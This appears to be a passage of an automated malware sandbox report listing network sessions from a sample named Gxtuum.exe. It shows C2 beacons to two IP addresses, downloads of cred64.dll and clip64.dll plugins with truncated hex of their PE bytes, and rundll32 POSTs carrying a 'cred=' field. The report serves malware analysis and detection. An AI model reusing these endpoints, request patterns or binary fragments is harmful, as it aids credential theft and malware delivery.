                                                              Dec 13, 2024 07:49:04.470221996 CET4996480192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:04.470453024 CET8049971185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:04.470532894 CET4997180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:04.470860004 CET4997180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:04.544013023 CET8049970185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:04.590632915 CET8049971185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:05.237987995 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:05.315751076 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:05.315752983 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:05.432454109 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:05.785996914 CET8049970185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:05.786107063 CET4997080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:05.831302881 CET8049971185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:05.831377029 CET4997180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:07.411752939 CET4997080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:07.412136078 CET4998280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:07.459168911 CET4997180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:07.459222078 CET4998380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:07.532526016 CET8049982185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:07.532605886 CET8049970185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:07.532656908 CET4998280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:07.532708883 CET4997080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:07.532891035 CET4998280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:07.578892946 CET8049983185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:07.578963041 CET4998380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:07.579169035 CET8049971185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:49:07.579220057 CET4997180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:07.653279066 CET8049982185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:07.743813038 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:07.816020966 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:07.883212090 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:07.925242901 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:08.876770973 CET8049982185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:08.876996040 CET4998280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:12.617927074 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:12.628253937 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:12.815761089 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:49:12.831415892 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:49:13.890316963 CET8049982185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:49:13.890463114 CET4998280192.168.2.4185.81.68.148
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 13, 2024 07:46:56.975074053 CET1.1.1.1192.168.2.40x8668No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 13, 2024 07:46:56.975074053 CET1.1.1.1192.168.2.40x8668No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                              Dec 13, 2024 07:46:56.975074053 CET1.1.1.1192.168.2.40x8668No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                              Dec 13, 2024 07:46:56.975074053 CET1.1.1.1192.168.2.40x8668No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                              Dec 13, 2024 07:46:56.975074053 CET1.1.1.1192.168.2.40x8668No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                              • 185.81.68.148
                                                              • 185.81.68.147
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449737185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:04.489165068 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:05.823302984 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:05 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449736185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:04.489203930 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:05.831722021 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:05 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449738185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:04.517991066 CET66OUTGET /7vhfjke3/Plugins/cred64.dll HTTP/1.1
                                                              Host: 185.81.68.147
                                                              Dec 13, 2024 07:47:05.846211910 CET1236INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:05 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              Last-Modified: Thu, 12 Dec 2024 18:53:38 GMT
                                                              ETag: "138c00-629173b693080"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 1281024
                                                              Content-Type: application/x-msdownload
                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$DsXRichPEdZg" 8P`~X~ `0lpp8.text `.rdata@@.dataD@.pdata`@@_RDATAt@@.rsrc v@@.relocl0x@B
                                                              Dec 13, 2024 07:47:05.846245050 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 07 63 11 00 48 8d
                                                              Data Ascii: H(A HcHcH,H(+H(A HbH03HlH(H(AHbH HH(H(A Hb
                                                              Dec 13, 2024 07:47:05.846383095 CET1236INData Raw: 48 8d 0d 70 be 12 00 e8 d3 0b 0c 00 48 8d 0d ec 8c 0f 00 48 83 c4 28 e9 9b e6 0c 00 cc cc cc 48 83 ec 28 41 b8 14 00 00 00 48 8d 15 c7 62 11 00 48 8d 0d 60 c3 12 00 e8 a3 0b 0c 00 48 8d 0d 2c 8d 0f 00 48 83 c4 28 e9 6b e6 0c 00 cc cc cc 48 83 ec
                                                              Data Ascii: HpHH(H(AHbH`H,H(kH(AHbHPsHlH(;H(AHbHCHH(H(A HbHpHH(H(E3HH
                                                              Dec 13, 2024 07:47:05.846417904 CET1236INData Raw: b8 28 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d 50 bd 12 00 e8 f3 06 0c 00 48 8d 0d 6c 93 0f 00 48 83 c4 28 e9 bb e1 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d a0 c1 12 00 e8 c3 06 0c 00 48 8d 0d ac 93 0f 00 48 83 c4
                                                              Data Ascii: (H`HPHlH(H(AH`HHH(H(AH`HPHH([H(AH`HcH,H(+H(AH_`Hp3HlH(H(A
                                                              Dec 13, 2024 07:47:05.846453905 CET1236INData Raw: 0b dd 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 e7 5d 11 00 48 8d 0d f0 b4 12 00 e8 13 02 0c 00 48 8d 0d ec 99 0f 00 48 83 c4 28 e9 db dc 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 bf 5d 11 00 48 8d 0d 40 bf 12 00 e8 e3 01
                                                              Data Ascii: H(AH]HHH(H(AH]H@H,H(H(AH]HHlH({H(AHo]HHH(KH(AHO]H0SHH(
                                                              Dec 13, 2024 07:47:05.846489906 CET1236INData Raw: 48 8d 0d 2c a0 0f 00 48 83 c4 28 e9 2b d8 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 7f 5c 11 00 48 8d 0d 50 ba 12 00 e8 33 fd 0b 00 48 8d 0d 6c a0 0f 00 48 83 c4 28 e9 fb d7 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00 00 48 8d 15 87 5c
                                                              Data Ascii: H,H(+H(A4H\HP3HlH(H(A(H\H HH(H(AH\HHH(H(A4Hg\H`H,H(kH(A(Ho\HPsH
                                                              Dec 13, 2024 07:47:05.846741915 CET1236INData Raw: 23 aa 12 00 e8 86 f8 0b 00 48 8d 0d 4f a9 0f 00 48 83 c4 28 e9 4e d3 0c 00 cc cc cc cc cc cc 48 8d 0d a9 a9 0f 00 e9 3c d3 0c 00 cc cc cc cc 48 83 ec 28 45 33 c0 48 8d 15 e2 b0 10 00 48 8d 0d e3 ae 12 00 e8 46 f8 0b 00 48 8d 0d ef a9 0f 00 48 83
                                                              Data Ascii: #HOH(NH<H(E3HHFHH(HIdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHHHH
                                                              Dec 13, 2024 07:47:05.846777916 CET1236INData Raw: 00 00 48 c7 80 80 02 00 00 0f 00 00 00 48 89 90 88 02 00 00 48 89 90 98 02 00 00 48 c7 80 a0 02 00 00 0f 00 00 00 48 89 90 a8 02 00 00 48 89 90 b8 02 00 00 48 c7 80 c0 02 00 00 0f 00 00 00 48 89 90 c8 02 00 00 48 89 90 d8 02 00 00 48 c7 80 e0 02
                                                              Data Ascii: HHHHHHHHHHH HHkdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHH
                                                              Dec 13, 2024 07:47:05.846945047 CET1236INData Raw: c2 45 85 c0 7f d1 41 ff c8 45 85 c0 78 1e 41 0f b6 01 42 0f b6 8c 30 30 48 11 00 41 0f b6 02 42 0f b6 84 30 30 48 11 00 2b c8 75 04 48 83 c7 07 45 33 db 4c 8b d7 48 85 ff 75 05 45 8b d3 eb 19 44 38 1f 74 0a 66 90 49 ff c2 45 38 1a 75 f8 44 2b d7
                                                              Data Ascii: EAExAB00HAB00H+uHE3LHuED8tfIE8uD+A?AHL5@LAILEt+At#AB10HB820HuIIxAB00HAB00H+u.B0<Ft"AHA|3H\$ Hl$(Ht$
                                                              Dec 13, 2024 07:47:05.846980095 CET1236INData Raw: 01 00 ff c7 48 83 c6 20 3b 7b 28 7c d6 48 8b 4c 24 28 8b 44 24 30 44 89 75 00 89 01 e9 19 01 00 00 48 8b 7b 08 48 8d 4c 24 30 48 89 8b 20 03 00 00 41 8b c6 89 44 24 30 48 85 ff 74 67 66 0f 1f 44 00 00 48 8b d7 48 8b cb e8 55 5e 02 00 4c 39 b3 20
                                                              Data Ascii: H ;{(|HL$(D$0DuH{HL$0H AD$0HtgfDHHU^L9 tHH1-3H;hr"H;psH`HLH`HL,HXHuD$0L DuAAE9S(~FD$MfDHC JDHtH@HDE
                                                              Dec 13, 2024 07:47:05.966497898 CET1236INData Raw: 80 79 28 00 48 89 1c 24 74 0c 8b 41 08 44 8b 49 0c 8b 59 10 eb 0e 41 b9 01 00 00 00 b8 d0 07 00 00 41 8b d9 44 8d 40 ff 41 c6 43 2a 01 41 83 f9 02 41 8d 49 0c 44 0f 4f c0 b8 1f 85 eb 51 41 f7 e8 44 8b d2 41 c1 fa 05 41 8b c2 c1 e8 1f 44 03 d0 b8
                                                              Data Ascii: y(H$tADIYAAD@AC*AAIDOQADAADhAAOiQQDAADAlDiAAAA+H$A{)fn\VYVH,ItRAkC<AC YWAC


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.449739185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:07.453156948 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:08.802464008 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:08 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.449740185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:07.468822002 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:08.830229044 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:08 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449741185.81.68.147801220C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:09.170512915 CET173OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 21
                                                              Cache-Control: no-cache
                                                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                              Data Ascii: id=246122658369&cred=
                                                              Dec 13, 2024 07:47:10.493333101 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:09 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449742185.81.68.147803272C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:09.188791990 CET173OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 21
                                                              Cache-Control: no-cache
                                                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                              Data Ascii: id=246122658369&cred=
                                                              Dec 13, 2024 07:47:10.515801907 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:09 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.449743185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:10.249389887 CET66OUTGET /7vhfjke3/Plugins/clip64.dll HTTP/1.1
                                                              Host: 185.81.68.147
                                                              Dec 13, 2024 07:47:11.583082914 CET1236INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:10 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              Last-Modified: Thu, 12 Dec 2024 18:53:40 GMT
                                                              ETag: "1f000-629173b87b500"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 126976
                                                              Content-Type: application/x-msdownload
                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$P@@@~@RichPELZg!Dbp`0@P8@`L.textCD `.rdata*u`vH@@.data@.rsrc@@.reloc@B
                                                              Dec 13, 2024 07:47:11.583102942 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 98 ae 01 10 b9 60 e8 01 10 e8 7f 4d 00 00 68 70 29 01
                                                              Data Ascii: j h`Mhp)ZYj hx_Mh)ZYjh?Mh0*ZYj hMh*ZYjhLh*jZYjh
                                                              Dec 13, 2024 07:47:11.583115101 CET1236INData Raw: 24 af 01 10 b9 d8 e8 01 10 e8 df 4c 00 00 68 50 2b 01 10 e8 4a 5a 00 00 59 c3 cc cc cc 6a 14 68 44 af 01 10 b9 f0 e8 01 10 e8 bf 4c 00 00 68 b0 2b 01 10 e8 2a 5a 00 00 59 c3 cc cc cc 6a 20 68 5c af 01 10 b9 08 e9 01 10 e8 9f 4c 00 00 68 10 2c 01
                                                              Data Ascii: $LhP+JZYjhDLh+*ZYj h\Lh,ZYjh} Lhp,YYjh}8_Lh,YYjhP?Lh0-YYjhhLh-YYjhKh-
                                                              Dec 13, 2024 07:47:11.583127022 CET1236INData Raw: 8a 55 00 00 59 c3 cc cc cc 6a 00 68 7d af 01 10 b9 80 ec 01 10 e8 ff 47 00 00 68 f0 39 01 10 e8 6a 55 00 00 59 c3 cc cc cc 6a 0c 68 e0 b2 01 10 b9 98 ec 01 10 e8 df 47 00 00 68 50 3a 01 10 e8 4a 55 00 00 59 c3 cc cc cc 6a 14 68 f0 b2 01 10 b9 b0
                                                              Data Ascii: UYjh}Gh9jUYjhGhP:JUYjhGh:*UYjhGh;UYjhGhp;TYjLhX_Gh;TYjh?Gh0<TYjdh(
                                                              Dec 13, 2024 07:47:11.583137989 CET1236INData Raw: 10 e8 3f 43 00 00 68 30 48 01 10 e8 aa 50 00 00 59 c3 cc cc cc 6a 0c 68 0c b7 01 10 b9 28 f0 01 10 e8 1f 43 00 00 68 90 48 01 10 e8 8a 50 00 00 59 c3 cc cc cc 6a 34 68 1c b7 01 10 b9 40 f0 01 10 e8 ff 42 00 00 68 f0 48 01 10 e8 6a 50 00 00 59 c3
                                                              Data Ascii: ?Ch0HPYjh(ChHPYj4h@BhHjPYj(hTXBhPIJPYjhpBhI*PYj<hBhJPYj0hBhpJOYjh_BhJOY
                                                              Dec 13, 2024 07:47:11.583257914 CET1236INData Raw: 05 00 00 83 7d 30 00 0f 84 02 05 00 00 83 7d 48 00 0f 84 f8 04 00 00 c7 85 d8 fb ff ff 00 00 00 00 c7 85 e8 fb ff ff 00 00 00 00 c7 85 ec fb ff ff 0f 00 00 00 c6 85 d8 fb ff ff 00 c6 45 fc 03 8d 8d c0 fb ff ff 6a 2f c7 85 c0 fb ff ff 00 00 00 00
                                                              Data Ascii: }0}HEj/h$=jjjjhTE0a}jjjjjECEjPPQ4a}4jjjjjE CE PhXQ8a}LM8uHCM8
                                                              Dec 13, 2024 07:47:11.583300114 CET1236INData Raw: 00 00 00 c6 45 20 00 83 fa 10 0f 82 cf 00 00 00 8b 4d 38 42 8b c1 81 fa 00 10 00 00 0f 82 b3 00 00 00 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 c6 00 00 00 e9 9a 00 00 00 6a 00 c7 07 00 00 00 00 8b cf c7 47 10 00 00 00 00 c7 47 14 0f 00 00
                                                              Data Ascii: E M8BI#+jGGh}=9Ur(MBrI#+wvRQCU4EEEDM B(I#+w,RQBMdY_^M3
                                                              Dec 13, 2024 07:47:11.583321095 CET1236INData Raw: 00 00 c6 45 ac 00 83 fa 10 72 28 8b 4d c8 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 38 52 51 e8 a8 3e 00 00 83 c4 08 a1 34 f2 01 10 46 8b 15 20 f2 01 10 e9 a6 fe ff ff 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f
                                                              Data Ascii: Er(MBrI#+w8RQ>4F MdY_^M3m>]pUjh$dPSVW3PEdEEEEE }4u0CE P4}EuCEP353=fD
                                                              Dec 13, 2024 07:47:11.583333015 CET1236INData Raw: 75 2d 8b 4f 14 8b c7 83 f9 10 72 02 8b 07 80 3c 30 20 74 1b 8b c7 83 f9 10 72 02 8b 07 83 7b 14 10 8b cb 72 02 8b 0b 8a 04 30 e9 cc 00 00 00 83 7f 14 10 89 7d f8 72 05 8b 07 89 45 f8 8b 1d 48 f2 01 10 33 d2 8b 0d 4c f2 01 10 85 db 74 2b 8b 45 f8
                                                              Data Ascii: u-Or<0 tr{r0}rEH3Lt+E0E]8C88HtB;rExr3t715LMf]8C88Ht@;r=L8C58+3]{r
                                                              Dec 13, 2024 07:47:11.583344936 CET1236INData Raw: 87 84 01 00 00 52 51 e8 24 35 00 00 83 c4 08 0f 10 4d bc 83 7d 1c 10 8d 55 08 f3 0f 7e 45 cc 8d 45 d8 0f 43 55 08 83 7d d0 10 8b 75 cc 66 0f 7e c9 0f 11 4d d8 0f 43 c1 66 0f d6 45 e8 8b 4d 18 89 4d d4 3b f1 75 61 83 ee 04 72 16 0f 1f 44 00 00 8b
                                                              Data Ascii: RQ$5M}U~EECU}uf~MCfEMM;uarD;ust4:u't)H:JutH:Jut@:Bt3ME0Gu;3Ur/MFrI#+VQF4UE
                                                              Dec 13, 2024 07:47:11.703248978 CET1236INData Raw: 8b 4d f0 33 cd e8 44 30 00 00 8b e5 5d c3 e8 86 62 00 00 e8 75 27 00 00 cc cc cc cc cc 55 8b ec 6a ff 68 2d 26 01 10 64 a1 00 00 00 00 50 53 56 57 a1 08 e0 01 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 ba 7d af 01 10 c7 45 fc 00 00 00 00 8d 4d 08 e8
                                                              Data Ascii: M3D0]bu'Ujh-&dPSVW3PEd}EM(|E@Pl5M}CM+IDuNFu+FVj`VSW`PjZW`j(aaWja aUr(MBrI


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.449744185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:10.546853065 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
